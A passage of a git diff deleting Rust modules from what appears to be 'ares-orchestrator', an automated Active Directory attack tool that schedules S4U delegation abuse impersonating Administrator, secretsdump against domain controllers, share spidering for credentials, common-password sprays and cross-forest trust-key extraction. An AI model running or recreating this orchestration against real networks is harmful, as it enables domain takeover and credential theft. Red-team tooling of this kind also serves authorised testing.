.insert(ip.clone()); - let _ = dispatcher - .state - .persist_mssql_dispatched(&dispatcher.queue, &ip) - .await; - } - Ok(false) => {} // already exists - Err(e) => warn!(err = %e, "Failed to publish MSSQL vulnerability"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/refresh.rs b/ares-orchestrator/src/automation/refresh.rs deleted file mode 100644 index 3c7363ad..00000000 --- a/ares-orchestrator/src/automation/refresh.rs +++ /dev/null @@ -1,32 +0,0 @@ -//! state_refresh -- periodic refresh of state from Redis. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::warn; - -use crate::dispatcher::Dispatcher; - -/// Periodically refreshes state from Redis to pick up worker-published discoveries. -/// Interval: 10s. -pub async fn state_refresh(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(10)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - // Skip first tick - interval.tick().await; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - if let Err(e) = dispatcher.state.refresh_from_redis(&dispatcher.queue).await { - warn!(err = %e, "State refresh failed"); - } - } -} diff --git a/ares-orchestrator/src/automation/s4u.rs b/ares-orchestrator/src/automation/s4u.rs deleted file mode 100644 index 38f10451..00000000 --- a/ares-orchestrator/src/automation/s4u.rs +++ /dev/null @@ -1,354 +0,0 @@ -//! auto_s4u_exploitation -- exploit delegation vulnerabilities via S4U. -//! -//! When constrained or RBCD delegation vulnerabilities are discovered (via -//! `find_delegation` or BloodHound), this automation dispatches S4U attacks -//! using available credentials for the delegating account. -//! -//! NOTE: Unconstrained delegation is handled by `auto_unconstrained_exploitation` -//! which orchestrates the coerce → dump → secretsdump chain. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Cooldown after a failed S4U attempt before retrying the same vuln. -/// Set to 5 minutes to wait for AD account lockout to expire. -const S4U_FAILURE_COOLDOWN: Duration = Duration::from_secs(300); - -/// Maximum consecutive failures before giving up on a vuln. -/// Set higher than the expected number of spray-induced lockouts -/// so that S4U can eventually succeed once sprays stop re-locking. -const S4U_MAX_FAILURES: u32 = 6; - -/// Kerberos/SMB errors that indicate an account is permanently disabled/revoked. -/// These should permanently block the vuln — no point retrying. -const PERMANENT_REVOCATION_PATTERNS: &[&str] = &["STATUS_ACCOUNT_DISABLED", "KDC_ERR_KEY_EXPIRED"]; - -/// Kerberos/SMB errors that indicate a temporary lockout. -/// These should count as failures but NOT permanently block — the lockout expires. -const LOCKOUT_PATTERNS: &[&str] = &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; - -/// Monitors for delegation vulnerabilities and dispatches S4U attacks. -/// Interval: 20s. -pub async fn auto_s4u_exploitation( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let deleg_notify = dispatcher.delegation_notify.clone(); - let cred_notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Track dispatch attempts per vuln to prevent infinite retry loops. - // Maps vuln_id -> (last_dispatch_time, failure_count) - let mut dispatch_tracker: HashMap = HashMap::new(); - - // Track task_id -> vuln_id so we can check completed task results for - // revocation errors and immediately stop retrying those vulns. - let mut task_vuln_map: HashMap = HashMap::new(); - - loop { - // Wake on: timer tick, new delegation vuln, OR new credential (so S4U fires - // immediately when a constrained delegation account's password is cracked). - tokio::select! { - _ = interval.tick() => {}, - _ = deleg_notify.notified() => {}, - _ = cred_notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Check completed tasks for revocation/lockout errors. - // - Permanent revocation (disabled account) → block forever. - // - Temporary lockout → just count the failure, let cooldown handle retry. - { - let state = dispatcher.state.read().await; - let finished: Vec = task_vuln_map - .keys() - .filter(|tid| state.completed_tasks.contains_key(tid.as_str())) - .cloned() - .collect(); - for tid in finished { - if let Some(result) = state.completed_tasks.get(&tid) { - if has_permanent_revocation(result) { - if let Some(vid) = task_vuln_map.remove(&tid) { - warn!( - task_id = %tid, - vuln_id = %vid, - "S4U blocked: account permanently disabled — no further retries" - ); - dispatch_tracker.entry(vid).or_insert((Instant::now(), 0)).1 = - S4U_MAX_FAILURES; - } - } else if has_lockout_error(result) { - if let Some(vid) = task_vuln_map.remove(&tid) { - debug!( - task_id = %tid, - vuln_id = %vid, - "S4U lockout detected — will retry after cooldown" - ); - // Don't increment failure count beyond what dispatch already counted. - // The cooldown timer is already set from dispatch time. - } - } else { - // Success or non-revocation error — reset failure count so - // subsequent dispatches aren't permanently blocked by the - // S4U_MAX_FAILURES threshold. - if let Some(vid) = task_vuln_map.remove(&tid) { - if let Some(entry) = dispatch_tracker.get_mut(&vid) { - entry.1 = 0; - } - } - } - } - } - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Skip if already domain admin - if state.has_domain_admin { - continue; - } - - state - .discovered_vulnerabilities - .values() - .filter_map(|vuln| { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype != "constrained_delegation" && vtype != "rbcd" { - return None; - } - - // Already exploited? - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - return None; - } - - // Check dispatch cooldown — skip if recently dispatched and failed - if let Some((last_time, failures)) = dispatch_tracker.get(&vuln.vuln_id) { - if *failures >= S4U_MAX_FAILURES { - debug!( - vuln_id = %vuln.vuln_id, - failures = *failures, - "S4U skipped: max failures reached" - ); - return None; - } - if last_time.elapsed() < S4U_FAILURE_COOLDOWN { - return None; // Still in cooldown - } - } - - // Extract the delegating account name from details - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str()) - .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())) - .map(|s| s.to_string()); - - let target_spn = vuln - .details - .get("delegation_target") - .and_then(|v| v.as_str()) - .or_else(|| { - vuln.details - .get("AllowedToDelegate") - .and_then(|v| v.as_str()) - }) - .map(|s| s.to_string()); - - // Find a credential or hash for the delegating account - let credential = account_name.as_ref().and_then(|acct| { - state - .credentials - .iter() - .find(|c| c.username.to_lowercase() == acct.to_lowercase()) - .cloned() - }); - - let hash = account_name.as_ref().and_then(|acct| { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == acct.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - .cloned() - }); - - // Need at least a credential or hash to perform S4U - if credential.is_none() && hash.is_none() { - debug!( - vuln_id = %vuln.vuln_id, - vuln_type = %vuln.vuln_type, - account = ?account_name, - "S4U skipped: no credential or hash for delegating account" - ); - return None; - } - - // Resolve domain and DC IP - let domain = credential - .as_ref() - .map(|c| c.domain.clone()) - .or_else(|| hash.as_ref().map(|h| h.domain.clone())) - .unwrap_or_default(); - - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - Some(S4uWork { - vuln: vuln.clone(), - credential, - hash, - target_spn, - domain, - dc_ip, - }) - }) - .collect() - }; - - for item in work { - let mut payload = json!({ - "technique": "s4u_attack", - "vuln_type": item.vuln.vuln_type, - "target": item.vuln.target, - "domain": item.domain, - "impersonate": "Administrator", - }); - - if let Some(ref spn) = item.target_spn { - payload["target_spn"] = json!(spn); - } - if let Some(ref dc) = item.dc_ip { - payload["target_ip"] = json!(dc); - } - - // Attach credential or hash — provide both flat fields (for prompt - // builders) and nested credential object (for structured extraction). - if let Some(ref cred) = item.credential { - payload["username"] = json!(cred.username); - payload["password"] = json!(cred.password); - payload["account_name"] = json!(cred.username); - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } else if let Some(ref hash) = item.hash { - payload["hash"] = json!(hash.hash_value); - payload["username"] = json!(hash.username); - if let Some(ref aes) = hash.aes_key { - payload["aes_key"] = json!(aes); - } - } - - let vuln_id = item.vuln.vuln_id.clone(); - // Attach vuln_id so result processing can mark_exploited on success - payload["vuln_id"] = json!(&vuln_id); - - // Priority 10 = highest — S4U must run before other agents use the - // credential and potentially lock out the account. - match dispatcher - .throttled_submit("exploit", "privesc", payload, 10) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %vuln_id, - vuln_type = %item.vuln.vuln_type, - "S4U exploitation dispatched" - ); - // Record dispatch — increment failure count (reset on next success). - // The cooldown prevents rapid re-dispatch if it fails. - let entry = dispatch_tracker - .entry(vuln_id.clone()) - .or_insert((Instant::now(), 0)); - entry.0 = Instant::now(); - entry.1 += 1; - // Track task → vuln so we can check for revocation on completion. - task_vuln_map.insert(task_id, vuln_id); - } - Ok(None) => { - debug!(vuln_id = %vuln_id, "S4U task deferred by throttler"); - } - Err(e) => { - warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch S4U exploit") - } - } - } - } -} - -struct S4uWork { - vuln: ares_core::models::VulnerabilityInfo, - credential: Option, - hash: Option, - target_spn: Option, - domain: String, - dc_ip: Option, -} - -/// Check whether a task result matches any of the given error patterns. -fn result_matches_patterns(result: &ares_core::models::TaskResult, patterns: &[&str]) -> bool { - let payload = match &result.result { - Some(v) => v, - None => return false, - }; - - // Check error field - if let Some(err) = &result.error { - if patterns.iter().any(|p| err.contains(p)) { - return true; - } - } - - // Check raw tool outputs (array of strings embedded in the result payload) - if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for output in outputs { - if let Some(text) = output.as_str() { - if patterns.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - - // Check summary/result text - for key in &["summary", "output", "tool_output"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if patterns.iter().any(|p| text.contains(p)) { - return true; - } - } - } - - false -} - -/// Account is permanently disabled — no point retrying. -fn has_permanent_revocation(result: &ares_core::models::TaskResult) -> bool { - result_matches_patterns(result, PERMANENT_REVOCATION_PATTERNS) -} - -/// Account is temporarily locked out — will unlock after AD lockout duration. -fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { - result_matches_patterns(result, LOCKOUT_PATTERNS) -} diff --git a/ares-orchestrator/src/automation/secretsdump.rs b/ares-orchestrator/src/automation/secretsdump.rs deleted file mode 100644 index eb89a298..00000000 --- a/ares-orchestrator/src/automation/secretsdump.rs +++ /dev/null @@ -1,98 +0,0 @@ -//! auto_local_admin_secretsdump -- secretsdump with admin creds. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches secretsdump when admin credentials are detected. -/// Interval: 30s. Matches Python `_auto_local_admin_secretsdump`. -pub async fn auto_local_admin_secretsdump( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Collect credentials with passwords + target DCs. - // Do NOT gate on is_admin — the credential may have admin rights we - // haven't confirmed yet. Secretsdump will fail fast if it lacks - // privileges, but when it succeeds it's the fastest path to krbtgt. - // IMPORTANT: only target DCs in the credential's domain (or child - // domains). Cross-domain secretsdump attempts generate failed auths - // that trigger AD account lockout. - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let creds: Vec<_> = state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — secretsdump will always fail - // (non-admin) and wastes auth budget reserved for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .cloned() - .collect(); - - let mut items = Vec::new(); - for cred in &creds { - let cred_domain = cred.domain.to_lowercase(); - for (dc_domain, dc_ip) in state.domain_controllers.iter() { - let d = dc_domain.to_lowercase(); - // Same domain, child domain, or parent domain - if d == cred_domain - || d.ends_with(&format!(".{cred_domain}")) - || cred_domain.ends_with(&format!(".{d}")) - { - let dedup = format!( - "{}:{}:{}", - dc_ip, - cred.domain.to_lowercase(), - cred.username.to_lowercase() - ); - if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { - items.push((dedup, dc_ip.clone(), cred.clone())); - } - } - } - } - items - }; - - for (dedup_key, dc_ip, cred) in work.into_iter().take(3) { - let priority = if cred.is_admin { 2 } else { 5 }; - match dispatcher - .request_secretsdump(&dc_ip, &cred, priority) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, dc = %dc_ip, user = %cred.username, "Admin secretsdump dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch secretsdump"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/share_enum.rs b/ares-orchestrator/src/automation/share_enum.rs deleted file mode 100644 index bf4ba60e..00000000 --- a/ares-orchestrator/src/automation/share_enum.rs +++ /dev/null @@ -1,106 +0,0 @@ -//! auto_share_enumeration -- enumerate SMB shares on discovered hosts using credentials. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches share enumeration on each known host when credentials are available. -/// Interval: 20s. Dedup key: "{host_ip}:{cred_user}:{cred_domain}". -pub async fn auto_share_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - let mut no_cred_logged = false; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - // Use first non-delegation credential to avoid burning auth budget - // on accounts reserved for S4U exploitation. - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => { - no_cred_logged = false; - c.clone() - } - None => { - if !no_cred_logged { - info!( - hosts = state.hosts.len(), - target_ips = state.target_ips.len(), - "Share enum: no credentials in memory yet, waiting" - ); - no_cred_logged = true; - } - continue; - } - }; - - // Enumerate shares on every known host (target IPs + discovered hosts) - let mut ips: Vec = state.target_ips.clone(); - for host in &state.hosts { - if !ips.contains(&host.ip) { - ips.push(host.ip.clone()); - } - } - - ips.into_iter() - .filter_map(|ip| { - let dedup = format!( - "{}:{}:{}", - ip, - cred.username.to_lowercase(), - cred.domain.to_lowercase() - ); - if state.is_processed(DEDUP_SHARE_ENUM, &dedup) { - None - } else { - Some((dedup, ip, cred.clone())) - } - }) - .take(5) - .collect() - }; - - for (dedup_key, host_ip, cred) in work { - match dispatcher.request_share_enumeration(&host_ip, &cred).await { - Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "Share enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SHARE_ENUM, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SHARE_ENUM, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch share enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/shares.rs b/ares-orchestrator/src/automation/shares.rs deleted file mode 100644 index 8aa45798..00000000 --- a/ares-orchestrator/src/automation/shares.rs +++ /dev/null @@ -1,82 +0,0 @@ -//! auto_share_spider -- spider readable shares for credentials. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Spiders readable shares for credentials using available creds. -/// Interval: 30s. Matches Python `_auto_share_spider`. -pub async fn auto_share_spider(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - // Use first non-delegation credential to avoid burning auth budget - // on accounts reserved for S4U exploitation. - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - - state - .shares - .iter() - .filter(|s| { - let perms = s.permissions.to_uppercase(); - perms.contains("READ") && !s.name.to_uppercase().ends_with('$') - }) - .filter_map(|s| { - let dedup = format!("{}:{}:{}:{}", s.host, s.name, cred.username, cred.domain); - if state.is_processed(DEDUP_SPIDERED_SHARES, &dedup) { - None - } else { - Some((dedup, s.host.clone(), s.name.clone(), cred.clone())) - } - }) - .take(3) // limit batch size - .collect() - }; - - for (dedup_key, host, share, cred) in work { - match dispatcher.request_share_spider(&host, &share, &cred).await { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, host = %host, share = %share, "Share spider dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SPIDERED_SHARES, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SPIDERED_SHARES, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch share spider"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/stall_detection.rs b/ares-orchestrator/src/automation/stall_detection.rs deleted file mode 100644 index 269199f6..00000000 --- a/ares-orchestrator/src/automation/stall_detection.rs +++ /dev/null @@ -1,248 +0,0 @@ -//! auto_stall_detection -- detect when the operation is stuck and take action. -//! -//! When no new credentials or hashes have been discovered for a configurable -//! period (default: 5 minutes), this automation triggers fallback actions: -//! -//! 1. Re-attempt password spray with discovered users -//! 2. Start responder + NTLM relay if not already running -//! 3. Re-run LDAP description search with all known creds -//! -//! This prevents the operation from idling when all easy wins are exhausted. - -use std::sync::Arc; -use std::time::{Duration, Instant}; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// How long without new discoveries before we consider the op stalled. -const STALL_THRESHOLD: Duration = Duration::from_secs(180); // 3 minutes - -/// Minimum interval between stall recovery actions. -const RECOVERY_COOLDOWN: Duration = Duration::from_secs(120); // 2 minutes - -/// Monitors for discovery stalls and triggers fallback actions. -/// Interval: 60s. -pub async fn auto_stall_detection( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(60)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - let start = Instant::now(); - let mut last_cred_count = 0usize; - let mut last_hash_count = 0usize; - let mut last_change = Instant::now(); - let mut last_recovery = Instant::now() - RECOVERY_COOLDOWN; // allow immediate first recovery - let mut recovery_attempts = 0u32; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Don't check stall in the first 3 minutes (let initial recon complete) - if start.elapsed() < Duration::from_secs(180) { - continue; - } - - let (cred_count, hash_count, has_da, has_creds, has_users, has_dcs) = { - let state = dispatcher.state.read().await; - ( - state.credentials.len(), - state.hashes.len(), - state.has_domain_admin, - !state.credentials.is_empty(), - !state.users.is_empty(), - !state.domain_controllers.is_empty(), - ) - }; - - // Skip if we've achieved domain admin - if has_da { - continue; - } - - // Check if there has been progress - if cred_count > last_cred_count || hash_count > last_hash_count { - last_cred_count = cred_count; - last_hash_count = hash_count; - last_change = Instant::now(); - recovery_attempts = 0; // Reset on progress - continue; - } - - // Not stalled yet - if last_change.elapsed() < STALL_THRESHOLD { - continue; - } - - // Cooldown between recovery actions - if last_recovery.elapsed() < RECOVERY_COOLDOWN { - continue; - } - - // Cap recovery attempts (don't spam indefinitely) - if recovery_attempts >= 10 { - continue; - } - - info!( - stall_duration_secs = last_change.elapsed().as_secs(), - cred_count, - hash_count, - recovery_attempt = recovery_attempts + 1, - "Operation stall detected — triggering fallback actions" - ); - - last_recovery = Instant::now(); - recovery_attempts += 1; - - // --- Fallback 1: Password spray with discovered users --- - // Skip domains with pending delegation vulns — sprays lock delegation - // accounts and prevent S4U exploitation from succeeding. - if has_users && has_dcs { - let spray_work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - // Collect domains that have pending delegation vulns - let delegation_domains: std::collections::HashSet = state - .discovered_vulnerabilities - .values() - .filter(|v| { - let vt = v.vuln_type.to_lowercase(); - (vt == "constrained_delegation" || vt == "rbcd") - && !state.exploited_vulnerabilities.contains(&v.vuln_id) - }) - .filter_map(|v| { - v.details - .get("domain") - .or_else(|| v.details.get("Domain")) - .and_then(|d| d.as_str()) - .map(|d| d.to_lowercase()) - }) - .collect(); - state - .domain_controllers - .iter() - .filter(|(domain, _)| { - // Skip domains with pending delegation vulns - if delegation_domains.contains(&domain.to_lowercase()) { - return false; - } - // Use recovery_attempts in key so each round dispatches fresh sprays - let key = format!( - "stall_spray:{}:{}", - domain.to_lowercase(), - recovery_attempts - ); - !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) - }) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - }; - - for (domain, dc_ip) in spray_work { - let payload = json!({ - "technique": "password_spray", - "target_ip": dc_ip, - "domain": domain, - "use_common_passwords": true, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 7) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Stall recovery: password spray dispatched"); - let key = format!( - "stall_spray:{}:{}", - domain.to_lowercase(), - recovery_attempts - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Stall recovery: spray failed"), - } - } - } - - // --- Fallback 2: Low-hanging fruit (SYSVOL, GPP, LDAP descriptions, LAPS) --- - if has_creds && has_dcs { - let lhf_work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let key = format!( - "stall_lhf:{}:{}:{}", - cred_domain, - cred.username.to_lowercase(), - recovery_attempts - ); - if state.is_processed(DEDUP_EXPANSION_CREDS, &key) { - return None; - } - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - })?; - Some((key, dc_ip, cred_domain, cred.clone())) - }) - .take(2) - .collect() - }; - - for (key, dc_ip, domain, cred) in lhf_work { - match dispatcher - .request_low_hanging_fruit(&dc_ip, &domain, &cred, 6) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Stall recovery: low-hanging fruit dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_EXPANSION_CREDS, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Stall recovery: low-hanging fruit failed"), - } - } - } - } -} diff --git a/ares-orchestrator/src/automation/trust.rs b/ares-orchestrator/src/automation/trust.rs deleted file mode 100644 index 99143ded..00000000 --- a/ares-orchestrator/src/automation/trust.rs +++ /dev/null @@ -1,448 +0,0 @@ -//! auto_trust_follow -- trust enumeration, key extraction, and cross-domain attacks. -//! -//! Three-phase automation: -//! -//! 1. **Trust enumeration**: When DA is achieved, dispatch `enumerate_domain_trusts` -//! to discover trust relationships via LDAP. -//! 2. **Trust key extraction**: When trusts are known and DA creds are available, -//! dispatch secretsdump for trust account hashes (e.g. `FABRIKAM$`). -//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm -//! ticket creation and secretsdump against the foreign DC. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Monitors for trust account hashes and dispatches cross-domain attacks. -/// Interval: 30s. -pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Auto-enumerate trusts when DA is achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - // Dispatch trust enumeration for each known DC (once per domain) - let enum_work: Vec<(String, String, String)> = state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let key = format!("trust_enum:{}", domain.to_lowercase()); - !state.is_processed(DEDUP_TRUST_FOLLOW, &key) - }) - .map(|(domain, dc_ip)| { - let key = format!("trust_enum:{}", domain.to_lowercase()); - (key, domain.clone(), dc_ip.clone()) - }) - .collect(); - drop(state); - - for (key, domain, dc_ip) in enum_work { - // Find a credential for this domain - let cred = { - let s = dispatcher.state.read().await; - s.credentials - .iter() - .find(|c| { - !c.password.is_empty() - && (c.domain.to_lowercase() == domain.to_lowercase() - || domain - .to_lowercase() - .ends_with(&format!(".{}", c.domain.to_lowercase()))) - }) - .cloned() - }; - - if let Some(cred) = cred { - let payload = json!({ - "techniques": ["enumerate_domain_trusts"], - "target_ip": dc_ip, - "domain": domain, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("recon", "recon", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - "Trust enumeration dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } - } - } - } - } - - // Extract trust keys for known cross-forest trusts - { - let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let extract_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_cross_forest()) - .filter_map(|trust| { - let key = format!("trust_extract:{}", trust.domain.to_lowercase()); - if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; - } - // Find a DC in the source domain (our domain, not the trust target) - // The trust domain is the foreign one; we need to secretsdump our DC - let source_domain = state.domains.first()?; - let dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned()?; - Some((key, trust.flat_name.clone(), trust.domain.clone(), dc_ip)) - }) - .collect(); - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - drop(state); - - if let Some(cred) = admin_cred { - for (key, flat_name, trust_domain, dc_ip) in extract_work { - // secretsdump -just-dc-user FABRIKAM$ to get trust key - let trust_account = format!("{}$", flat_name.to_uppercase()); - let payload = json!({ - "technique": "secretsdump", - "target_ip": dc_ip, - "domain": cred.domain, - "just_dc_user": trust_account, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - "reason": format!("extract trust key for {}", trust_domain), - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 2) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - trust_account = %trust_account, - trust_domain = %trust_domain, - "Trust key extraction dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => {} - Err(e) => { - warn!(err = %e, "Failed to dispatch trust key extraction") - } - } - } - } - } - } - - // Follow trust keys (inter-realm ticket + foreign secretsdump) - let (work, admin_cred_phase3): ( - Vec, - Option, - ) = { - let state = dispatcher.state.read().await; - - // Skip if no domain admin yet — trust extraction requires DA-level creds - if !state.has_domain_admin { - continue; - } - - // Build lookup of known trust flat names → TrustInfo so we only - // process actual trust account hashes, not random machine accounts. - let trust_by_flat: std::collections::HashMap = - state - .trusted_domains - .values() - .map(|t| (t.flat_name.to_uppercase(), t)) - .collect(); - - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - - let items = state - .hashes - .iter() - .filter_map(|hash| { - if !hash.username.ends_with('$') { - return None; - } - - // Only process hashes that match a known trust account - let netbios = hash.username.trim_end_matches('$').to_uppercase(); - let trust = trust_by_flat.get(&netbios)?; - - // Resolve source domain — fall back to first known domain - // when secretsdump output lacks domain prefix for machine accounts - let source_domain = if hash.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - hash.domain.clone() - }; - if source_domain.is_empty() { - return None; - } - - let dedup_key = format!( - "trust_follow:{}:{}", - source_domain.to_lowercase(), - hash.username.to_lowercase() - ); - if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { - return None; - } - - // Use the FQDN from the trust relationship — 